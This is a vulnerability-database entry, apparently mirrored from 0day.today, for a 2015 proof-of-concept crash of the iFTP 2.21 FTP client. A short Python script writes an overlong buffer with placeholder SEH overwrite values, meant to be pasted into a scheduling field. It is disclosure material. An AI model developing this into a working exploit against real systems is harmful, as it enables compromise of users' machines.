Lucene search
K

i.FTP 2.21 SEH Overflow Crash PoC

🗓️ 28 Apr 2015 00:00:00Reported by Avinash ThapaType 
zdt
 zdt
🔗 0day.today👁 23 Views

FTP 2.21 SEH Overflow Crash PoC by Avinash Kumar Thap

Code
# iFTP 2.21 SEH overwritten Crash PoC
# Author: Avinash Kumar Thapa "-Acid"
# Date of Testing :  28th April'2015
# Vendor's home page: http://www.memecode.com/iftp.php
# Software's Url: http://www.memecode.com/data/iftp-win32-v2.21.exe
# Crash Point: Go to Schedule > Schedule download > {+} >Time field
 
 
buffer = "A"*600
 
buffer += "BBBB" # Pointer to Next SEH Record
 
buffer += "CCCC" # SEH HANDLER
 
 
file = "test.txt"
 
f = open(file, "w")
 
f.write(buffer)
 
f.close()

#  0day.today [2018-02-06]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation